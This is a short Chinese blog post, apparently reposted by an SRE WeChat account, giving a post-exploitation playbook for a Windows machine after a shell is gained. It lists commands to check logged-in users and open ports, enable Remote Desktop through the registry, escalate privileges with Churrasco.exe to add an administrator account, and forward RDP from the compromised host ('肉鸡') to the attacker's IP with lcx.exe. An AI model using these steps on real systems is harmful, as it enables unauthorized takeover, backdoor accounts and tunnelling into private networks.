// 后面是注解 命令中不需要后面的//

 

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

首先拿到shell后

以我个人的感觉应该探测下用户

 

query user // 判断下是否有用户登录和其他人登录过

 

其次在探测远程端口是否开放

 

netstat -an // 查看是否开放了3389端口

 

如果没有3389端口 那么判断下是否远程端口更改

首先开启下端口试试看

 

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 

//开启一下3389 端口 尝试连接

 

tasklist  /svc  // 查找一下进程PID 找到termservice服务对应的PID

 

netstat  -ano  //通过查找进程pid判断端口所对应服务

 

找到端口后,远程登录。

如果判断内网或者无权限等情况

运用巴西烤肉进行提权

 

Churrasco.exe "net user 用户名 密码 /add && net localgroup administrators 用户名 /add"

 

最后用户有了远程端口有了,可是无聊连接上判断是否是开启了IP指定登录或是内网

内网情况建议执行lcx进行端口转发进行连接

 

先本地监听X端口 lcx.exe -listen X 3389

c:\recycler\lcx.exe -slave 自己的ip X 肉鸡IP 3389    LCX转发

c:\recycler\lcx.exe -slave 202.134.12.12 X 123.123.4.4 3389

最后如何利用lcx搭建跳板呢?留给各位同学的一个课题作业吧!

 

欢迎互相指教 大道三千,欢迎探讨!

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄